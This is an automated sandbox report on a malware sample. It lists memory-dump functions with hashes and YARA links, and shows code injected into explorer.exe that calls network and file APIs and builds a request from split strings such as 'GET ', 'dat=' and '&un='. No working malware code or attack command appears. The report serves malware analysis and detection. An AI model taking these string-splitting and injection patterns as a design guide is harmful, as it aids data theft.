Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: e07e2a8f097dcf5f3c787854e9909303bd1c988aa5260eb80b99ec5175406626
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 46C01236080248BBCB126E85CC00F067B6AEBA4B60F008010FA080A5608632EAB0EA84

Uniqueness

Uniqueness Score: -1.00%

Function 01823A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: d663572d27d0b94748209d20cd1e082b7372008ef21d362e98e18119dcac0a07
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: DAC08C32080248BBC722AE45DC00F017B29E7A0B60F000021F6040A5608532EDA0D998

Uniqueness

Uniqueness Score: -1.00%

Function 0180AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 0f9eb21a0188ae45af17ed33e0bf910dc0f1a3064ee3b204f072e4d0bc517d39
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 04C08C32080248BBC7126A4ACD00F017B29E7B0B60F000020F6044A6A18932E9A0D589

Uniqueness

Uniqueness Score: -1.00%

Function 018336CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: eb1a8d0d80fc0df3c362e2e52b362a3a68db1fb6e05b2d9bd7921ea744744b16
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 87C02B70150440FFEB265F34CE00F147254F740B21F680354B220C54F0E5289D00F500

Uniqueness

Uniqueness Score: -1.00%

Function 018176E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: a81e0a1ff8539a85feda287c9a9e8288e94eaf93b6e665de29d7b750aed12ea7
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: C6C08C721411845EEB2B570CCE30B203A58AB38708F48059CAA11894E2C368AA82C208

Uniqueness

Uniqueness Score: -1.00%

Function 01827D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 212cd47950245248779a250a3010bbd75e695a13f061bee25262fb8cbb9914b2
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: ABB092353029808FCE17DF29C080B1533E4BB44B40B8400D0E400CBA21D229E9408900

Uniqueness

Uniqueness Score: -1.00%

Function 01832ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 1f7a7ad500d5d72ca45283084de8d20df85cc4432a5a93b4ce407ef3a5bd88d5
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: E0B01233C10441CFCF03EF44C650B197335FB00750F0544909401B7970C228AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 018499D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a47f610a18237b629255d635138b24177523d8b80bb6073be7e3226296a9c93
Instruction ID: 2d6343e6e0af700972285039b86c8bc69d7bf9e6c5278b55c203cb3a3ecf42d4
Opcode Fuzzy Hash: 4a47f610a18237b629255d635138b24177523d8b80bb6073be7e3226296a9c93
Instruction Fuzzy Hash: 109002A121100043D245619944047060045E7E1341F51C112AB148664CC5698DA56165

Uniqueness

Uniqueness Score: -1.00%

Function 01849950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db3d253232cb46689629506c33e068761886ca1857cab6b8f594561d2efab9e
Instruction ID: b33a7e6943ad2c91f30cff12fa5c72913152b0333dfdfc34a522daa95ff75623
Opcode Fuzzy Hash: 2db3d253232cb46689629506c33e068761886ca1857cab6b8f594561d2efab9e
Instruction Fuzzy Hash: 789002A120140403D281659948046070005E7D0342F51C111AB058665ECA698D957175

Uniqueness

Uniqueness Score: -1.00%

Function 018498A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb500993bba6c1279937c71f116468258fef2cab739d98823ca60b26501e2bdc
Instruction ID: 8dcfa472301c6c2292424d361858a906f394bd86e19a9a453e86015e20c573f8
Opcode Fuzzy Hash: fb500993bba6c1279937c71f116468258fef2cab739d98823ca60b26501e2bdc
Instruction Fuzzy Hash: 1390026130100403D243619944146060009E7D1385F91C112EA418665DC6658E97B172

Uniqueness

Uniqueness Score: -1.00%

Function 01849820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7016e8f3d29bb0d4a202980d89e33ef209a2a85cf8661c8d4e29335902e744b8
Instruction ID: 004892fa194b432283fc77d92386ef746ab6be891eec49902961893dfb82938a
Opcode Fuzzy Hash: 7016e8f3d29bb0d4a202980d89e33ef209a2a85cf8661c8d4e29335902e744b8
Instruction Fuzzy Hash: 0A90027124100403D282719944046060009F7D0381F91C112A9418664EC6958F9ABAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0184B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f7c35d6381ac2bd00c0d3342db65617c8d20a7f30bf4054252704177f9c91c
Instruction ID: 1dd3a3e7311b0a2a134c7e6a4455196186fdbde6f194a8e41585319434e9f106
Opcode Fuzzy Hash: 51f7c35d6381ac2bd00c0d3342db65617c8d20a7f30bf4054252704177f9c91c
Instruction Fuzzy Hash: 489002A1601140434681B19948044065015F7E1341391C221A9448670CC6A88D99A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 0184A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6562bbde6dd9f61bc6577a45ef955e7a90f8a88e5b3b5edc11bc93ca8011bcd
Instruction ID: c25697345306d6e030c6a3bad453fee381583bbb7499015c92ea72611b2d6375
Opcode Fuzzy Hash: e6562bbde6dd9f61bc6577a45ef955e7a90f8a88e5b3b5edc11bc93ca8011bcd
Instruction Fuzzy Hash: 2F90027120144003D2817199844460B5005F7E0341F51C511E9419664CC6558D9AA261

Uniqueness

Uniqueness Score: -1.00%

Function 01849B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fed8397f31bd85dde58edcb1ccba22a35612ffc41b28b91eae17552b3669b7
Instruction ID: 4f6522209fd5e2b57d2e94d0f9e4903c4472d79136ad920c0167a0b96ac5f2c7
Opcode Fuzzy Hash: 60fed8397f31bd85dde58edcb1ccba22a35612ffc41b28b91eae17552b3669b7
Instruction Fuzzy Hash: 4590026124100803D281719984147070006E7D0741F51C111A9018664DC6568EA976F1

Uniqueness

Uniqueness Score: -1.00%

Function 01849A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49036a0206e1259f771616a04851fe640b7a865f9dbe4592f72e5690cce4c1e7
Instruction ID: 4a7f80da553fe25b78ff02e2d0f16cfa81e20e00b119b4d5e3e852ec12bb8bfc
Opcode Fuzzy Hash: 49036a0206e1259f771616a04851fe640b7a865f9dbe4592f72e5690cce4c1e7
Instruction Fuzzy Hash: 4B90026120144443D28162994804B0F4105E7E1342F91C119AD14A664CC9558D996761

Uniqueness

Uniqueness Score: -1.00%

Function 01849A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65bd11040673069a13a47917e685dc20ba91077bf5961f99db8439a9136abc99
Instruction ID: 664cf1774d0bbc1c73fd92dde804b1cf1af74cc15153d40299f078d38ea6aef7
Opcode Fuzzy Hash: 65bd11040673069a13a47917e685dc20ba91077bf5961f99db8439a9136abc99
Instruction Fuzzy Hash: D990027120140403D241619948087470005E7D0342F51C111AE158665EC6A5CDD57571

Uniqueness

Uniqueness Score: -1.00%

Function 018495F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2eee2ecf4e51599c6cb19e8b6915465956961297dbfcfbad8dff964630560d2
Instruction ID: ca8eb594f2c1271cb90193d6503e712dbe11c5855b0d4329b1d18252fc5e999f
Opcode Fuzzy Hash: e2eee2ecf4e51599c6cb19e8b6915465956961297dbfcfbad8dff964630560d2
Instruction Fuzzy Hash: 2E90027120100803D245619948046860005E7D0341F51C111AF018765ED6A58DD57171

Uniqueness

Uniqueness Score: -1.00%

Function 01849520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61109ab902084ec9846c085fc9185adecaeb95d739c65cc7382c8a8d6954e55d
Instruction ID: d4ba1a2ae6ac312334df3bdde06862709bc65b5c7f433ca096a1d7c87673e4ee
Opcode Fuzzy Hash: 61109ab902084ec9846c085fc9185adecaeb95d739c65cc7382c8a8d6954e55d
Instruction Fuzzy Hash: 799002E1201140934641A2998404B0A4505E7E0341B51C116EA048670CC5658D95A175

Uniqueness

Uniqueness Score: -1.00%

Function 0184AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5c2d4c125580f04ae84fe7e88a3bcbbb0e8a65b03d818418f7fdeb9c8b98e8
Instruction ID: 8d0c8430e94abd0b4dbc4933d33175e87dccb554b2294136c26be81c23f61a7b
Opcode Fuzzy Hash: 4e5c2d4c125580f04ae84fe7e88a3bcbbb0e8a65b03d818418f7fdeb9c8b98e8
Instruction Fuzzy Hash: 05900271A05000139281719948146464006F7E0781B55C111A9508664CC9948F9963E1

Uniqueness

Uniqueness Score: -1.00%

Function 01849560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd820628ce2de4d51149c87a93640f8aea41535294e85520e809e2fbf907e011
Instruction ID: 5940809cd608360d9dcf0b16cb72a3d81a9a392e8ee1f9e1541e0e60f49147ef
Opcode Fuzzy Hash: fd820628ce2de4d51149c87a93640f8aea41535294e85520e809e2fbf907e011
Instruction Fuzzy Hash: AA900265221000030286A599060450B0445F7D6391391C115FA40A6A0CC6618DA96361

Uniqueness

Uniqueness Score: -1.00%

Function 01849FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a95c36049e497bac3f837a041d5062149e03cb83510ae4775552f54e2e696ea
Instruction ID: 2a21063992f86cb0499a3109530e0af6f4e726c91049bb28f7311fd3b99dd5ff
Opcode Fuzzy Hash: 5a95c36049e497bac3f837a041d5062149e03cb83510ae4775552f54e2e696ea
Instruction Fuzzy Hash: 3A90027131114403D251619984047060005E7D1341F51C511A9818668DC6D58DD57162

Uniqueness

Uniqueness Score: -1.00%

Function 0184A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510f665f41e3e2c0d429f1122f2f13610dbcff1218c94b2c865ad03f0e43db5c
Instruction ID: 9969e4f6e20419ea69f72f56b48b1842b86980434995a7f1b5496de4ac0da75d
Opcode Fuzzy Hash: 510f665f41e3e2c0d429f1122f2f13610dbcff1218c94b2c865ad03f0e43db5c
Instruction Fuzzy Hash: AA900271301000539641A6D95804A4A4105E7F0341B51D115AD008664CC5948DA56161

Uniqueness

Uniqueness Score: -1.00%

Function 01849730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd7268f75761f24027dfc2fabc14bcc6adf08bacdb0a928634d81726f0652db
Instruction ID: e0d4bcd577bec1757905f154ef0890f5c1b3aa2d4a38c900c12f4d3cba288c41
Opcode Fuzzy Hash: 5cd7268f75761f24027dfc2fabc14bcc6adf08bacdb0a928634d81726f0652db
Instruction Fuzzy Hash: 9490026160500403D281719954187060015E7D0341F51D111A9018664DC6998F9976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01849760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dd9d14e369b0d4437a9e27220fbfbbcc524a54ef6f99164c6dc739c3b7f1b6
Instruction ID: edb168a2bab242b2fc657756cd319babf70fc59844446daab2e78d32581b20cd
Opcode Fuzzy Hash: e2dd9d14e369b0d4437a9e27220fbfbbcc524a54ef6f99164c6dc739c3b7f1b6
Instruction Fuzzy Hash: 9590027120100403D241619955087070005E7D0341F51D511A9418668DD6968D957161

Uniqueness

Uniqueness Score: -1.00%

Function 0184A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23333823ad6218f75828d9b586a35806118d098e2a17889fcc4430e5fae46dfc
Instruction ID: a2f9779d708df1d64137f7e74bff6be1733e0e7e0e72a70273e701cc90812a3f
Opcode Fuzzy Hash: 23333823ad6218f75828d9b586a35806118d098e2a17889fcc4430e5fae46dfc
Instruction Fuzzy Hash: 2990027520504443D64165995804A870005E7D0345F51D511A94186ACDC6948DA5B161

Uniqueness

Uniqueness Score: -1.00%

Function 01849770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8018854834e17d55319fffdc92c97352afe6354531ac3a94562dcb5e3aa36a40
Instruction ID: 09bd12428e10aa929e918c455af86150328581f7b967773e5d8102537a6d7501
Opcode Fuzzy Hash: 8018854834e17d55319fffdc92c97352afe6354531ac3a94562dcb5e3aa36a40
Instruction Fuzzy Hash: 3590026120504443D24165995408A060005E7D0345F51D111AA0586A5DC6758D95B171

Uniqueness

Uniqueness Score: -1.00%

Function 018496D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf8fd820ac035df69ec4cd9e8aa6fd9fc3e2aa5c846b032ff8d3b518568be491
Instruction ID: 2448972afd56eb2b82c2933e5460abc377dd360bb9e0b942353438d25fdc0dfc
Opcode Fuzzy Hash: bf8fd820ac035df69ec4cd9e8aa6fd9fc3e2aa5c846b032ff8d3b518568be491
Instruction Fuzzy Hash: DD90027120100843D24161994404B460005E7E0341F51C116A9118764DC655CD957561

Uniqueness

Uniqueness Score: -1.00%

Function 01849610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7129330f080d8a4a1879055df10f0066c1dabf2e0fe38963f5de8e2230bec29
Instruction ID: e7f1816fe1bbc2b0df5e452f5a7ebe4885fa183d6b8bd5cb866c22486b218c49
Opcode Fuzzy Hash: a7129330f080d8a4a1879055df10f0066c1dabf2e0fe38963f5de8e2230bec29
Instruction Fuzzy Hash: 9C90027160500803D291719944147460005E7D0341F51C111A9018764DC7958F9976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01849650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3cfa9b533f0a9ecb28d23f2261029326dcfa60820b97280ce7c7eb44a252f5
Instruction ID: 94c3455c96c7fbc6bcdf51011c1fc9c666255c1e8e328272315408f98cd5acc8
Opcode Fuzzy Hash: 8d3cfa9b533f0a9ecb28d23f2261029326dcfa60820b97280ce7c7eb44a252f5
Instruction Fuzzy Hash: C290027120504843D28171994404A460015E7D0345F51C111A90587A4DD6658E99B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01849670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c8bc3882ce1b4228a9bd59d3a2df25c71edac19762480bf424e2987707df52aa
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0189FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0189FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0184CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01895720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01895720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0189fdda
0x0189fde2
0x0189fde5
0x0189fdec
0x0189fdfa
0x0189fdff
0x0189fe0a
0x0189fe0f
0x0189fe17
0x0189fe1e
0x0189fe19
0x0189fe19
0x0189fe19
0x0189fe20
0x0189fe21
0x0189fe22
0x0189fe25
0x0189fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0189FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0189FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0189FE01

Memory Dump Source

Source File: 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, Offset: 017E0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: f01fe7e1a4d479dbac28ec47ea242e698f4d262c9ca2563873d3d8641e1d9193
Instruction ID: 87b18453fad8cf396c3058bc3d525ef01899f23d74693536b472a342a02bdbed
Opcode Fuzzy Hash: f01fe7e1a4d479dbac28ec47ea242e698f4d262c9ca2563873d3d8641e1d9193
Instruction Fuzzy Hash: B1F0FC722401017FDB251A49DC05F27BF5ADB44730F180319F714D51D1EA62FA2087F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3424 Parent PID: 1868 explorer.exeCOMMON

Executed Functions

Function 04E0E782, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 04E0E92F
setsockopt.WS2_32 ref: 04E0F031
recv.WS2_32 ref: 04E0F05A

Strings

ose, xrefs: 04E0EB40
&br=, xrefs: 04E0ED0A
&un=, xrefs: 04E0ECF2
nnec, xrefs: 04E0EB2B
GET , xrefs: 04E0EB19
dat=, xrefs: 04E0EA91
: cl, xrefs: 04E0EB39
Co, xrefs: 04E0EB24
tion, xrefs: 04E0EB32
&sql, xrefs: 04E0EC72

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
Instruction ID: 05a08f429c8a42e59cf6e3197d898be10f18f95d23525e852edb3cf25f37cf06
Opcode Fuzzy Hash: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
Instruction Fuzzy Hash: EF529031618B088BDB69EF68D4847EAB7E1FB54304F50992ED4AFC7182EE70B589C741

Uniqueness

Uniqueness Score: -1.00%

Function 04E0DA32, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 04E0DC49

Strings

`, xrefs: 04E0DC1D

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction ID: c80890d3e32054dcd68d498750101fb1b09b3204abd4b0da890b666502456056
Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction Fuzzy Hash: 8F224070A18A099FCB59DF68C8997ADF7E1FB58305F40562EE46ED3290DB30E491CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04E0AFCC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 04E0B027

Strings

ket, xrefs: 04E0AFFA
clos, xrefs: 04E0AFEA
esoc, xrefs: 04E0AFF2

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
Instruction ID: 6cf9002464e619efc9e43b66038af509ff710bd3221174b9636102f62457eb9e
Opcode Fuzzy Hash: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
Instruction Fuzzy Hash: DEF0C27020C7484FC780DF289488BA9B7E0FB89314F4806BDE44ECB245C7318582C743

Uniqueness

Uniqueness Score: -1.00%

Function 04E0AFD2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 04E0B027

Strings

ket, xrefs: 04E0AFFA
clos, xrefs: 04E0AFEA
esoc, xrefs: 04E0AFF2

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction ID: 3fc41b1cfae1e89e4a6f1b50f873e4aabe9882671bef9118ce676c4cb51f83cd
Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction Fuzzy Hash: FAF01770218B089FDB84EF18D088B6AB6E0FB89318F58566DB45ECB244C77589868B02

Uniqueness

Uniqueness Score: -1.00%

Function 04E0AF52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 04E0AFB1

Strings

ect, xrefs: 04E0AF81
conn, xrefs: 04E0AF7A

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction ID: df63977102922e66477d78450e9984214277b27f158e55d9db07dec75fba5a1a
Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction Fuzzy Hash: EE012170618A0C8FCB84EF5CE048B5477E0EB59314F1585BEA80DCB266C674D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 04E0AF4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 04E0AFB1

Strings

ect, xrefs: 04E0AF81
conn, xrefs: 04E0AF7A

Memory Dump Source

Source File: 0000000A.00000002.918791521.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
Instruction ID: a784a4c5136da4f000553066864f2d66bff2743a9b81e26f8f38fb5ed83a3fe1
Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
Instruction Fuzzy Hash: 87015E70518A0C8FCB84EF4CD088B54B7E0EB58315F1545AA980DDB266C674D9818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 04E0AED2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

